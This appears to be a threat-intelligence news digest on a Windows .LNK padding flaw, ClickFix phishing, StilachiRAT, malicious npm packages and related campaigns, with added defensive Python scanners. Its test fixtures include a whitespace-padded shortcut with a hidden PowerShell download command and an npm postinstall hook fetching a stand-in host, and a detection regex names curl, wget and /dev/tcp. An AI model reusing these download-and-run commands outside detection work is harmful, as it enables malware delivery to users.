Bill Mann@CyberInsider
//
Multiple state-backed hacking groups, including those from North Korea, Iran, Russia, and China, have been exploiting a Windows zero-day vulnerability since 2017 for data theft and cyber espionage. The flaw, tracked by Trend Micro's Zero Day Initiative as ZDI-CAN-25373 (advisory ZDI-25-148), is a user-interface misrepresentation in how Windows displays .LNK shortcut files: the command-line arguments stored in the shortcut are padded with large amounts of whitespace so that the malicious command, typically one that downloads further malware, does not appear in the file's properties dialog, while Windows still executes it when the shortcut is opened. ZDI researchers found nearly 1,000 tampered .LNK files, though they believe the actual number of attacks could be much higher.
Microsoft has chosen not to address this vulnerability with a security update, saying the report "does not meet the bar for immediate servicing". This decision comes despite the fact that the technique has been used in an eight-year-long spying campaign, relying on megabytes of whitespace to bury the actual command out of sight in the user interface. Dustin Childs of the Zero Day Initiative told *The Register* that while this is one of many bugs used by attackers, its unpatched status makes it a significant concern.
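To make the technique concrete, here is an added example (not code from ZDI, Trend Micro or the campaigns described above) that parses the fixed header and StringData section of a Shell Link file according to the MS-SHLLINK layout, pulls out the COMMAND_LINE_ARGUMENTS string, and measures how much whitespace precedes the real command. The padding thresholds and the set of whitespace characters are this example's own assumptions; the constructed sample pads with 900 spaces, far less than the megabytes reported in real samples, but the check is the same.

```python
import struct

# Shell Link (.lnk) layout per MS-SHLLINK: fixed 76-byte header, optional
# LinkTargetIDList and LinkInfo blocks, then StringData entries in a fixed order.
LNK_HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}

HAS_LINK_TARGET_ID_LIST = 0x01
HAS_LINK_INFO = 0x02
HAS_NAME = 0x04
HAS_RELATIVE_PATH = 0x08
HAS_WORKING_DIR = 0x10
HAS_ARGUMENTS = 0x20
HAS_ICON_LOCATION = 0x40
IS_UNICODE = 0x80

STRING_DATA_ORDER = (
    (HAS_NAME, "name"),
    (HAS_RELATIVE_PATH, "relative_path"),
    (HAS_WORKING_DIR, "working_dir"),
    (HAS_ARGUMENTS, "arguments"),
    (HAS_ICON_LOCATION, "icon_location"),
)

# Whitespace treated as padding, and the thresholds below, are this example's
# heuristic choices, not values taken from the ZDI advisory.
PADDING_CHARS = " \t\r\n\x0b\x0c"
MAX_VISIBLE_CHARS = 260      # assumption: roughly what the Properties "Target" box will show
MIN_SUSPICIOUS_PADDING = 32  # assumption: no benign shortcut needs this much leading whitespace


def parse_string_data(data):
    """Return the StringData entries of a .lnk file as a dict of name -> str."""
    if (len(data) < LNK_HEADER_SIZE or struct.unpack_from("<I", data, 0)[0] != LNK_HEADER_SIZE
            or data[4:20] != LNK_CLSID):
        raise ValueError("not a Shell Link file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    off = LNK_HEADER_SIZE
    if flags & HAS_LINK_TARGET_ID_LIST:      # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                # LinkInfoSize (4 bytes) includes itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    out = {}
    for flag, name in STRING_DATA_ORDER:
        if not flags & flag:
            continue
        count = struct.unpack_from("<H", data, off)[0]   # CountCharacters, no terminator
        off += 2
        nbytes = count * 2 if unicode else count
        raw = data[off:off + nbytes]
        off += nbytes
        out[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252", errors="replace")
    return out


def analyze_arguments(args):
    """Measure whitespace padding in COMMAND_LINE_ARGUMENTS and flag ZDI-CAN-25373-style abuse."""
    visible = args.lstrip(PADDING_CHARS)
    leading = len(args) - len(visible)
    control_ws = sum(1 for c in args if c in "\t\r\n\x0b\x0c")
    suspicious = (leading >= MIN_SUSPICIOUS_PADDING
                  or len(args) > MAX_VISIBLE_CHARS
                  or control_ws > 0)
    return {
        "total_chars": len(args),
        "leading_padding": leading,
        "control_whitespace": control_ws,
        "hidden_command": visible.strip(PADDING_CHARS),
        "suspicious": suspicious,
    }


def scan_lnk(data):
    """Parse a .lnk blob and report on its arguments field."""
    return analyze_arguments(parse_string_data(data).get("arguments", ""))


def build_lnk(relative_path, arguments):
    """Build a minimal Unicode .lnk with only RELATIVE_PATH and COMMAND_LINE_ARGUMENTS (constructed sample)."""
    flags = HAS_RELATIVE_PATH | HAS_ARGUMENTS | IS_UNICODE
    header = (struct.pack("<I", LNK_HEADER_SIZE) + LNK_CLSID + struct.pack("<I", flags)
              + struct.pack("<I", 0)          # FileAttributes
              + b"\x00" * 24                  # CreationTime / AccessTime / WriteTime
              + struct.pack("<III", 0, 0, 1)  # FileSize, IconIndex, ShowCommand = SW_SHOWNORMAL
              + struct.pack("<H", 0)          # HotKey
              + b"\x00" * 10)                 # Reserved1 / Reserved2 / Reserved3
    assert len(header) == LNK_HEADER_SIZE

    def string_data(s):
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + string_data(relative_path) + string_data(arguments)


# Constructed samples: a benign shortcut and one padded the way the advisory describes.
BENIGN_LNK = build_lnk(r"..\Windows\System32\cmd.exe", "/c dir")
PADDED_LNK = build_lnk(r"..\Windows\System32\cmd.exe",
                       " " * 900 + '/c powershell -nop -w hidden -c "iwr https://example.invalid/p"')

if __name__ == "__main__":
    for label, blob in (("benign", BENIGN_LNK), ("padded", PADDED_LNK)):
        print(label, scan_lnk(blob))
```

Run it over a collection of shortcuts (every *.lnk in a user's Downloads folder, or the contents of a suspicious archive) and review anything where suspicious is True. Any tab, carriage return or line feed in a shortcut's arguments is worth a look regardless of padding length, since legitimate shortcuts have no reason to contain them.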
References:
- The Hacker News: An unpatched security flaw impacting Microsoft Windows has been exploited by 11 state-sponsored groups from China, Iran, North Korea, and Russia as part of data theft, espionage, and financially motivated campaigns that date back to 2017.
- ZDI: Published Advisories: ZDI-25-148: (0Day) Microsoft Windows LNK File UI Misrepresentation Remote Code Execution Vulnerability
- The Register - Security: Microsoft isn't fixing 8-year-old shortcut exploit abused for spying
- securityaffairs.com: State-Sponsored Actors and Cybercrime Gangs Abuse Malicious .lnk Files for Espionage and Data Theft
- CyberInsider: Microsoft has acknowledged that its latest Windows update has unintentionally uninstalled the Copilot app from some Windows 11 devices.
- BleepingComputer: New Windows zero-day exploited by 11 state hacking groups since 2017
- The DefendOps Diaries: Exploiting Windows Zero-Day Vulnerabilities: The Role of State-Sponsored Hacking Groups
- securityonline.info: Hidden Threat: Zero-Day Windows Shortcut Exploited by Global APT Networks
- www.it-daily.net: Critical Windows security vulnerability discovered
- socradar.io: Windows Shortcut Zero-Day (ZDI-CAN-25373) Exploited by State-Backed Threat Actors Since 2017: Overview of Key Details
- Virus Bulletin: Trend Micro ZDI's Peter Girnus & Aliakbar Zahravi describe how researchers uncovered both state-sponsored and cybercriminal groups extensively exploiting ZDI-CAN-25373, a Windows .lnk file vulnerability that enables hidden command execution.
- Tech Monitor: Windows shortcut exploit used as zero-day in global cyber espionage campaigns
- www.ghacks.net: Windows has an 8-year-old security issue that is exploited and known by Microsoft for some time
- www.cybersecuritydive.com: A vulnerability that allows for malicious payloads to be delivered via Windows shortcut files has not yet been addressed by Microsoft and has been under active attack for eight years.
- www.techradar.com: An unpatched Windows zero-day flaw has been exploited by 11 nation-state attackers
- Security Risk Advisors: 🚩APT Groups Exploit Unpatched Windows Shortcut Vulnerability for Espionage and Data Theft
- hackread.com: 11 Nation-State Hackers Exploit Unpatched Windows Flaw Since 2017
- : Windows Shortcut Flaw Exploited by 11 State-Sponsored Groups
- Blog: Microsoft reluctant to patch Windows zero-day exploited by nation-state hackers
- Sam Bent: Windows Shortcut Zero-Day Used by Nation-States
- Jon Greig: Researchers Trend Micro's Zero Day Initiative said they have identified multiple campaigns from nation-state groups in North Korea, China and Russia exploiting an issue impacting .lnk files. Microsoft said the report "does not meet the bar for immediate servicing".
- Threats | CyberScoop: Trend Micro researchers discovered and reported the eight-year-old defect to Microsoft six months ago. The company hasn't made any commitments to patch or remediate the issue.
- www.trendmicro.com: ZDI-CAN-25373: Windows Shortcut Exploit Abused as Zero-Day in Widespread APT Campaigns
- Logpoint: Windows Shell Link Vulnerability ZDI-CAN-25373: Detecting Hidden Commands
- SecureWorld News: Nation-State Hackers Exploit Windows Shortcut Zero-Day Vulnerability
- Information Security Buzz: Windows Shortcut Zero-Day Under Active Attack
- borncity.com: Windows shortcut exploit used by state hackers as a 0-day since 2017
- Help Net Security: APTs have been using zero-day Windows shortcut exploit for eight years (ZDI-CAN-25373)
- aboutdfir.com: Microsoft isn't fixing 8-year-old shortcut exploit abused for spying. An exploitation avenue found by Trend Micro in Windows has been used in an eight-year-long spying campaign, but there's no sign of a fix from Microsoft, which apparently considers this a low priority.
- securityboulevard.com: Microsoft Won't Fix This Bad Zero Day (Despite Wide Abuse)
Microsoft Threat@Microsoft Security Blog
//
An ongoing phishing campaign impersonating Booking.com is targeting hospitality employees with credential-stealing malware. Microsoft Threat Intelligence has identified the campaign, which began in December 2024 and is ongoing as of February 2025. Cybercriminals are sending malicious emails to employees likely to work with Booking.com, in North America, Oceania, South and Southeast Asia, and Europe, using a social engineering technique called ClickFix to deliver the malware. This campaign aims to conduct financial fraud and theft by compromising employee credentials.
The ClickFix technique uses fake error messages and verification prompts that tell the user to "fix" the problem by copying a command and pasting it into the Windows Run dialog or a terminal, so the victim launches the malware downloader themselves. The phishing emails vary in content, referencing negative guest reviews, requests from prospective guests, online promotion opportunities, and account verification to induce clicks. The threat actor, tracked as Storm-1865, has evolved its tactics to bypass security measures.
References:
- krebsonsecurity.com: Booking.com Phishers May Leave You With Reservations
- Source Asia: Phishing campaign impersonates Booking .com, delivers a suite of credential-stealing malware
- The DefendOps Diaries: Understanding the ClickFix Phishing Threat to the Hospitality Industry
- The Hacker News: Microsoft Warns of ClickFix Phishing Campaign Targeting Hospitality Sector via Fake Booking[.]com Emails
- : 'ClickFix' Phishing Scam Impersonates Booking.com to Target Hospitality
- The Record: Cybercriminals are sending malicious emails to hospitality employees who are likely to work with Booking.com
- bsky.app: Microsoft is warning that an ongoing phishing campaign impersonating Booking.com is using ClickFix social engineering attacks to infect users with various malware, including infostealers and RATs.
- The Register - Security: That 'angry guest' email from Booking.com? It's a scam, not a 1-star review
- www.techradar.com: Microsoft warns about a new phishing campaign impersonating Booking.com
- TARNKAPPE.INFO: ClickFix phishing: new campaign targets the hotel industry
- Virus Bulletin: Microsoft researchers identified a phishing campaign (Storm-1865) that uses a social engineering technique called ClickFix to deliver multiple credential-stealing malware in order to conduct financial fraud and theft.
- BleepingComputer: Microsoft warns that an ongoing phishing campaign impersonating Booking.com is using ClickFix social engineering attacks to infect users with various malware, including infostealers and RATs.
- Email Security - Blog: "ClickFix" Phishing Impersonation Campaign Targets Hospitality Sector
- eSecurity Planet: Phishing Campaign Impersonates Booking.com, Plants Malware
- Security Risk Advisors: 🚩Microsoft Detects Ongoing Phishing Impersonation of Booking.com Using "ClickFix" to Deliver Credential-Stealing Malware
- Blog: Phishing campaign impersonates Booking.com, plants malware
- Davey Winder: Booking.com CAPTCHA attack impacts customers, but systems not breached, a spokesperson has said.
- www.computerworld.com: Description of the ClickFix phishing campaign targeting the hospitality industry via fake Booking.com emails.
- www.cysecurity.news: A phishing campaign impersonates Booking.com, targeting organizations in hospitality, using the ClickFix method to spread credential-stealing malware.
- www.cybersecurity-insiders.com: Malware Impersonating Booking.com Targets Hospitality Sector
- thecyberexpress.com: Microsoft Detects Ongoing Phishing Impersonation of Booking.com Using "ClickFix" to Deliver Credential-Stealing Malware
- securityonline.info: Booking.com Impersonated in Phishing Campaign Delivering Credential-Stealing Malware
- gbhackers.com: Microsoft Threat Intelligence has identified an ongoing phishing campaign that began in December 2024, targeting organizations in the hospitality industry by impersonating the online travel agency Booking.com. The campaign, tracked as Storm-1865, employs a sophisticated social engineering technique called ClickFix to deliver credential-stealing malware designed to conduct financial fraud and theft.
- Metacurity: The attackers are impersonating Booking.com to deliver credential-stealing malware.
- Talkback Resources: Storm-1865 Impersonates Booking.com in Phishing Scheme
- Blog: Storm-1865 leverages 'ClickFix' technique in new phishing campaign
@cyberalerts.io
//
The FBI has issued a warning about the rising trend of cybercriminals using fake file converter tools to distribute malware. These tools, often advertised as free online document converters, are designed to trick users into downloading malicious software onto their computers. While these tools may perform the advertised file conversion, they also secretly install malware that can lead to identity theft, ransomware attacks, and the compromise of sensitive data.
The threat actors exploit various file converter or downloader tools, enticing users with promises of converting files from one format to another, such as .doc to .pdf, or combining multiple files. The malicious code, disguised as a file conversion utility, can scrape uploaded files for personal identifying information, including social security numbers, banking information, and cryptocurrency wallet addresses. The FBI advises users to be cautious of such tools and report any instances of this scam to protect their assets.
The FBI Denver Field Office is warning that it is increasingly seeing scams involving free online document converter tools and encourages victims to report any instance of the scam. Malwarebytes has identified some of the suspect file converters, including Imageconvertors.com, convertitoremp3.it, convertisseurs-pdf.com and convertscloud.com. The agency emphasized the importance of educating people about these threats so that they do not fall victim to them.
References:
- Talkback Resources: FBI warns of malware-laden websites posing as free file converters, leading to ransomware attacks and data theft.
- gbhackers.com: Beware! Malware Hidden in Free Word-to-PDF Converters
- www.bitdefender.com: Free file converter malware scam "rampant" claims FBI
- Malwarebytes: Warning over free online file converters that actually install malware
- bsky.app: Free file converter malware scam "rampant" claims FBI.
- bsky.app: @bushidotoken.net has dug up some IOCs for the FBI's recent warning about online file format converters being used to distribute malware
- Help Net Security: FBI: Free file converter sites and tools deliver malware
- www.techradar.com: Free online file converters could infect your PC with malware, FBI warns
- Security | TechRepublic: Scam Alert: FBI 'Increasingly Seeing' Malware Distributed In Document Converters
- securityaffairs.com: The FBI warns of a significant increase in scams involving free online document converters to infect users with malware. The FBI warns that threat actors use malicious online document converters to steal users' sensitive information and infect their systems with malware.
- The DefendOps Diaries: FBI warns against fake file converters spreading malware and stealing data. Learn how to protect yourself from these cyber threats.
- PCMag UK security: PSA: Be Careful Around Free File Converters, They Might Contain Malware
- www.bleepingcomputer.com: FBI warnings are true: fake file converters do push malware
- www.techradar.com: FBI warns some web-based file management services are not as well-intentioned as they seem.
- www.csoonline.com: Improvements Microsoft has made to Office document security that disable macros and other embedded malware by default has forced criminals to up their innovation game, a security expert said Monday.
- www.itpro.com: Fake file converter tools are on the rise: here's what you need to know
- Cyber Security News: The FBI Denver Field Office has warned sternly about the rising threat of malicious online file converter tools. These seemingly harmless services, often advertised as free tools to convert or merge files, are being weaponized by cybercriminals to install malware on users' computers. This malware can have devastating consequences, including ransomware attacks and identity theft.
Microsoft Incident@Microsoft Security Blog
//
Microsoft's Incident Response team has uncovered a novel remote access trojan (RAT) named StilachiRAT, which employs sophisticated techniques to evade detection and steal sensitive data. Discovered in November 2024, StilachiRAT demonstrates advanced methods to remain undetected, persist in the targeted environment, and exfiltrate valuable information. The malware is capable of gathering system information, stealing credentials stored in browsers, targeting cryptocurrency wallets, and using command-and-control connectivity for remote execution.
The RAT scans for configuration data of 20 different cryptocurrency wallet extensions for the Google Chrome browser and extracts credentials from the browser, indicating its focus on cryptocurrency theft and credential compromise. It establishes communication with remote command-and-control (C2) servers to execute commands, manipulate registry settings, and clear logs, making it challenging to detect and remove. Microsoft advises users to download software from official sources, use web browsers with SmartScreen support, and enable Safe Links and Safe Attachments for Office 365 to prevent StilachiRAT infections.
References:
- bsky.app: Microsoft has discovered a new remote access trojan (RAT) that employs "sophisticated techniques" to avoid detection, ensure persistence, and extract sensitive information.
- BleepingComputer: Microsoft: New RAT malware used for crypto theft, reconnaissance
- Microsoft Security Blog: StilachiRAT analysis: From system reconnaissance to cryptocurrency theft
- BleepingComputer: Microsoft has discovered a new remote access trojan (RAT) that employs "sophisticated techniques" to avoid detection, ensure persistence, and extract sensitive information.
- hackread.com: StilachiRAT: Sophisticated malware targets crypto wallets & credentials. Undetected, it maps systems & steals data. Microsoft advises strong security measures.
- Virus Bulletin: Microsoft researchers uncovered a novel remote access trojan (RAT) named StilachiRAT that demonstrates sophisticated techniques to evade detection, persist in the target environment, and exfiltrate sensitive data.
- securityaffairs.com: New StilachiRAT uses sophisticated techniques to avoid detection
- The DefendOps Diaries: Understanding StilachiRAT: A New Cyber Threat Targeting Cryptocurrency
- CyberInsider: Microsoft Uncovers New Stealthy Malware 'StilachiRAT' Targeting User Data
- The Hacker News: Microsoft Warns of StilachiRAT: A Stealthy RAT Targeting Credentials and Crypto Wallets
- Tech Monitor: New remote access trojan 'StilachiRAT' identified
- Help Net Security: Stealthy StilachiRAT steals data, may enable lateral movement
- www.techradar.com: Microsoft warns of a devious new RAT malware which can avoid detection with apparent ease
- The Record: A previously unreported remote access trojan that Microsoft researchers dubbed StilachiRAT is designed to steal a wide range of data, including information about cryptocurrency wallet extensions for Google's Chrome browser.
- Blog: New 'StilachiRAT' found scurrying in crypto wallets
- BleepingComputer: Detailed technical analysis of the StilachiRAT malware and its operational capabilities.
- securityonline.info: Microsoft Uncovers Sophisticated StilachiRAT Malware
- Sophos X-Ops: Microsoft has discovered a new remote access trojan (RAT) dubbed StilachiRAT, which uses sophisticated techniques to avoid detection.
- Cyber Security News: Microsoft has recently issued a warning about a novel remote access trojan (RAT) known as StilachiRAT, which has been discovered to possess sophisticated capabilities for evading detection and stealing sensitive data. This malware was identified by Microsoft Incident Response researchers in November 2024 and is notable for its ability to target Remote Desktop Protocol (RDP).
lucija.valentic@reversinglabs.com (Lucija@Blog (Main)
//
A new malware campaign has been discovered targeting developers through malicious npm packages. Researchers at ReversingLabs identified two packages, ethers-provider2 and ethers-providerz, designed to inject a reverse shell into locally installed copies of the popular 'ethers' library, giving attackers remote access to compromised systems. The attack hides its payload by modifying legitimate files of 'ethers', so the backdoor persists even after the initial packages are removed.
This campaign shows a sophisticated approach to software supply chain attacks. The malicious packages act as downloaders that patch the 'ethers' library with a reverse shell; removing them does not remove the patch, and once 'ethers' is reinstalled the modifications are reintroduced, granting attackers continued access. ReversingLabs detected the threat with their Spectra platform and published a YARA rule to identify compromised systems. While ethers-providerz has been removed from npm, ethers-provider2 remained available at the time of writing, a substantial risk, especially if the same tactic is used against more popular npm packages in the future.
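As an added illustration (not ReversingLabs' detection logic or their YARA rule), the script below does two checks a developer can run locally: it lists every installed package that declares an install-time lifecycle hook, which is the moment a downloader package gets to execute, and it hashes the files of a package such as 'ethers' so that later rewrites or added files show up in a diff. The node_modules tree, package names and hook commands are constructed for the demo; example-provider is a hypothetical stand-in, not one of the packages named above, and the suspicious-command patterns are this example's own choice.

```python
import hashlib
import json
import os
import re
import shutil
import tempfile

# npm runs these scripts during install; a downloader package has to use one of them.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")
# Heuristic for a hook that fetches or evaluates remote content (this example's own patterns).
SUSPICIOUS = re.compile(
    r"(?i)\b(?:curl|wget|eval|child_process|base64|powershell)\b|node\s+-e\b|https?://|/dev/tcp/")


def find_lifecycle_scripts(node_modules):
    """Every installed package that declares an install-time hook, with a suspicion flag."""
    findings = []
    for dirpath, _, filenames in os.walk(node_modules):
        if "package.json" not in filenames:
            continue
        try:
            with open(os.path.join(dirpath, "package.json"), encoding="utf-8") as f:
                pkg = json.load(f)
        except (OSError, ValueError):
            continue
        for hook in LIFECYCLE_HOOKS:
            cmd = (pkg.get("scripts") or {}).get(hook)
            if cmd:
                findings.append({"package": pkg.get("name", dirpath), "version": pkg.get("version", "?"),
                                 "hook": hook, "command": cmd,
                                 "suspicious": bool(SUSPICIOUS.search(cmd))})
    return findings


def snapshot(package_dir):
    """sha256 of every file in an installed package, keyed by path relative to the package."""
    hashes = {}
    for dirpath, _, filenames in os.walk(package_dir):
        for name in filenames:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as f:
                rel = os.path.relpath(path, package_dir).replace(os.sep, "/")
                hashes[rel] = hashlib.sha256(f.read()).hexdigest()
    return hashes


def diff_snapshot(before, after):
    """Files added, removed or rewritten between two snapshots of the same package."""
    return {"added": sorted(set(after) - set(before)),
            "removed": sorted(set(before) - set(after)),
            "modified": sorted(p for p in set(before) & set(after) if before[p] != after[p])}


def build_fixture():
    """Constructed node_modules tree: ethers plus two packages with postinstall hooks."""
    root = tempfile.mkdtemp(prefix="npm-demo-")
    nm = os.path.join(root, "node_modules")
    packages = {
        "ethers": {"name": "ethers", "version": "6.0.0"},
        "example-native": {"name": "example-native", "version": "1.0.0",
                           "scripts": {"postinstall": "node install.js"}},
        # hypothetical downloader package; the hook command is invented for the demo
        "example-provider": {"name": "example-provider", "version": "1.0.0",
                             "scripts": {"postinstall":
                                         "node -e \"require('https').get('https://example.invalid/stage2')\""}},
    }
    for name, pkg in packages.items():
        os.makedirs(os.path.join(nm, name, "lib"))
        with open(os.path.join(nm, name, "package.json"), "w", encoding="utf-8") as f:
            json.dump(pkg, f)
    with open(os.path.join(nm, "ethers", "lib", "index.js"), "w", encoding="utf-8") as f:
        f.write("module.exports = { version: '6.0.0' };\n")
    return root


def simulate_patch(root):
    """Mimic the reported behaviour: rewrite a file inside ethers and drop a loader beside it."""
    lib = os.path.join(root, "node_modules", "ethers", "lib")
    with open(os.path.join(lib, "index.js"), "a", encoding="utf-8") as f:
        f.write("require('./loader');\n")
    with open(os.path.join(lib, "loader.js"), "w", encoding="utf-8") as f:
        f.write("// stands in for the injected reverse-shell loader\n")


def run_demo():
    """Baseline ethers, apply the simulated patch, and report hooks plus the file diff."""
    root = build_fixture()
    nm = os.path.join(root, "node_modules")
    try:
        hooks = find_lifecycle_scripts(nm)
        before = snapshot(os.path.join(nm, "ethers"))
        simulate_patch(root)
        after = snapshot(os.path.join(nm, "ethers"))
    finally:
        shutil.rmtree(root)
    return {"hooks": hooks, "diff": diff_snapshot(before, after)}


if __name__ == "__main__":
    print(json.dumps(run_demo(), indent=2))
```

Baselining right after a clean install and re-running the diff after each npm install is the cheap version of this check. Running npm install --ignore-scripts (or setting ignore-scripts=true in .npmrc) stops lifecycle hooks from running at all, at the cost of breaking packages that legitimately need them.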
References:
- : Malicious npm Packages Deliver Sophisticated Reverse Shells
- Blog (Main): Malware found on npm infecting local package with reverse shell
- thehackernews.com: Malicious npm Package Modifies Local 'ethers' Library to Launch Reverse Shell Attacks
- hackread.com: New npm Malware Attack Infects Popular Ethereum Library with Backdoor
- www.bleepingcomputer.com: Two malicious packages were discovered on npm (Node package manager) that covertly patch legitimate, locally installed packages to inject a persistent reverse shell backdoor.
- The DefendOps Diaries: Explore a sophisticated npm attack revealing software supply chain vulnerabilities and the need for enhanced security measures.
- Datadog Security Labs: Introducing Supply-Chain Firewall: Protecting Developers from Malicious Open Source Packages
- www.csoonline.com: Malicious npm packages found to create a backdoor in legitimate code
- BleepingComputer: Infostealer campaign compromises 10 npm packages, targets devs
- www.scworld.com: reports on NPM related infostealer campaigns
Deeba Ahmed@hackread.com
//
A new wave of Android malware campaigns are exploiting Microsoft’s .NET MAUI framework to target users, particularly in India and China. Cybersecurity researchers at McAfee Labs have identified these malicious applications, which disguise themselves as legitimate services like banking and social media apps, to steal sensitive user information. These fake apps, collectively codenamed FakeApp, are not distributed through official channels like Google Play, but rather through bogus links sent via messaging apps and unofficial app stores. .NET MAUI, designed as a cross-platform development framework, allows these threats to conceal malicious code, making them difficult to detect by traditional antivirus solutions.
Researchers have found that the malware's core functionality is written entirely in C# and stored as binary large objects (blobs), so detection methods that only analyze DEX files or native libraries miss it. For instance, a fraudulent banking app impersonates IndusInd Bank, targeting Indian users by prompting them to enter personal and financial details, which are then sent to the attacker's command-and-control server. Another instance involves a fake social networking service app aimed at Chinese-speaking users, employing multi-stage dynamic loading to decrypt and execute its payload in separate stages, further complicating analysis and disrupting security tools.
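A quick triage for the framework fingerprint the researchers describe, as an added example rather than McAfee's tooling: .NET for Android and .NET MAUI builds ship a Mono runtime (libmonodroid.so, libmonosgen-2.0.so, libxamarin-app.so) under lib/<abi>/ and keep the managed assemblies under assemblies/, typically as assemblies.blob plus a manifest, while classes.dex holds only the Java-side glue. The two APKs below are constructed in memory with placeholder contents; the marker file names are real, the check is a heuristic, and a framework hit is a reason to pull the blobs into a .NET decompiler, not a verdict on its own.

```python
import io
import zipfile

# Native runtime libraries that a .NET for Android / .NET MAUI build ships under lib/<abi>/.
DOTNET_RUNTIME_LIBS = {"libmonodroid.so", "libmonosgen-2.0.so", "libxamarin-app.so"}
# Managed assemblies: assembly store blob plus manifest, or loose .dll files in older builds.
ASSEMBLY_SUFFIXES = (".blob", ".manifest", ".dll")


def triage_apk(apk_bytes):
    """Inspect an APK's entry list for the .NET for Android fingerprint. Heuristic, not a verdict."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        names = z.namelist()
    runtime = sorted(n for n in names
                     if n.startswith("lib/") and n.rsplit("/", 1)[-1] in DOTNET_RUNTIME_LIBS)
    assemblies = sorted(n for n in names
                        if n.startswith("assemblies/") and n.endswith(ASSEMBLY_SUFFIXES))
    dex = sorted(n for n in names if n.startswith("classes") and n.endswith(".dex"))
    return {
        "dotnet_android": bool(runtime or assemblies),
        "runtime_libs": runtime,
        "assembly_files": assemblies,
        "dex_files": dex,
        # what a DEX-only scanner sees is the Java shim, not the C# logic
        "managed_code_outside_dex": bool(assemblies),
    }


def make_sample_apk(extra_entries):
    """Constructed APK-shaped zip with placeholder contents (no real code inside)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"placeholder for binary XML")
        z.writestr("classes.dex", b"dex\n035\x00" + b"\x00" * 16)
        for name, payload in extra_entries.items():
            z.writestr(name, payload)
    return buf.getvalue()


PLAIN_APK = make_sample_apk({"res/values/strings.xml": b"<resources/>"})
MAUI_APK = make_sample_apk({
    "lib/arm64-v8a/libmonodroid.so": b"\x7fELF placeholder",
    "lib/arm64-v8a/libxamarin-app.so": b"\x7fELF placeholder",
    "assemblies/assemblies.manifest": b"placeholder manifest",
    "assemblies/assemblies.blob": b"placeholder assembly store",
})

if __name__ == "__main__":
    for label, apk in (("plain", PLAIN_APK), ("maui", MAUI_APK)):
        print(label, triage_apk(apk))
```

Point triage_apk at the bytes of a real APK to get the same report; when managed_code_outside_dex is True, the place to look for the app's real behaviour is the contents of assemblies/, not classes.dex.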
References:
- hackread.com: Hackers Are Using Microsoft’s .NET MAUI to Spread Android Malware
- securityaffairs.com: Android malware campaigns use .NET MAUI to evade detection
- The DefendOps Diaries: Understanding the Threat: How .NET MAUI is Changing Android Malware
- thehackernews.com: Hackers Use .NET MAUI to Target Indian and Chinese Users with Fake Banking, Social Apps
- www.infosecurity-magazine.com: New Android Malware Uses .NET MAUI to Evade Detection
- securityonline.info: New Android Malware Campaign Uses .NET MAUI to Evade Detection
- Security Risk Advisors: 🚩New Android Malware Campaign Exploits .NET MAUI Framework to Steal Sensitive Data
- MSSP feed for Latest: Threat actors exploited Microsoft's .NET MAUI cross-platform development framework to craft fake apps in new Android malware campaigns.
- Virus Bulletin: McAfee's Mobile Research Team discovered an Android malware campaign abusing .NET MAUI, a cross-platform development framework, to evade detection and remain active on devices for a long time.
- BleepingComputer: New Android malware campaigns use Microsoft's cross-platform framework .NET MAUI while disguising as legitimate services to evade detection.
- Security | TechRepublic: Android Malware Exploits a Microsoft-Related Security Blind Spot to Avoid Detection
Andres Ramos@Arctic Wolf
//
A resurgence of a fake CAPTCHA malware campaign has been observed, with threat actors compromising widely used websites across various industries. They are embedding a fake CAPTCHA challenge that redirects victims to a site triggering PowerShell code execution. This campaign exploits social engineering tactics and fake software downloads to deceive users into executing malicious scripts.
The fake CAPTCHA pages mimic legitimate verification prompts. When users attempt to pass the check, the page has already placed a command on their clipboard and instructs them to paste and run it, typically through the Windows Run dialog. The OBSCURE#BAT malware campaign delivered this way is a major threat to both individuals and organizations, primarily because of its ability to compromise sensitive data while using advanced evasion techniques, including API hooking, to hide files and registry entries and make detection difficult.
References:
- Arctic Wolf: Widespread Fake CAPTCHA Campaign Delivering Malware
- hackread.com: New OBSCURE#BAT Malware Targets Users with Fake Captchas
- Security Risk Advisors: 🚩 Fake CAPTCHA Malware Campaign Resurges With Multi-Stage PowerShell Infostealers
- SpiderLabs Blog: Resurgence of a Fake Captcha Malware Campaign
- www.zdnet.com: That weird CAPTCHA could be a malware trap: here's how to protect yourself
- Seceon Inc: Beware of Fake CAPTCHA Scams: How Cybercriminals Are Hijacking Your Clipboard to Steal Data
- www.cysecurity.news: Fake CAPTCHA Scams Trick Windows Users into Downloading Malware
- : Attackers Use Fake CAPTCHAs to Deploy Lumma Stealer RAT
- Broadcom Software Blogs: In a recent surge of sophisticated cyber threats, attackers are exploiting fake CAPTCHA verifications to hijack users' clipboards, leading to the installation of information-stealing malware.
- Security Risk Advisors: ClearFake injects JavaScript to show fake CAPTCHAs on compromised sites, tricking users into running PowerShell for Lumma/Vidar malware.
- www.cisecurity.org: The CIS CTI team spotted a Lumma Stealer campaign where SLTT victims were redirected to malicious webpages delivering fake CAPTCHA verifications.
- gbhackers.com: Attackers Leverage Weaponized CAPTCHAs to Execute PowerShell and Deploy Malware
- Sucuri Blog: Fake Cloudflare Verification Results in LummaStealer Trojan Infections
- securityonline.info: Fake Cloudflare Verification Prompts Deliver LummaStealer Trojan Through Infected WordPress Sites
Field Effect@Blog
//
A sophisticated cyber threat is rapidly evolving, exploiting user familiarity with CAPTCHAs to distribute malware through social engineering tactics. The ClearFake malicious JavaScript framework now utilizes 'ClickFix' techniques to trick users into executing malicious PowerShell commands, often disguised as fake reCAPTCHA or Cloudflare Turnstile verifications. This framework injects a fraudulent CAPTCHA on compromised websites, enticing visitors to unknowingly copy and paste malicious commands that lead to malware installation.
https://blog.sekoia.io/clearfakes-new-widespread-variant-increased-web3-exploitation-for-malware-delivery/
https://krebsonsecurity.com/2025/03/clickfix-how-to-infect-your-pc-in-three-easy-steps/
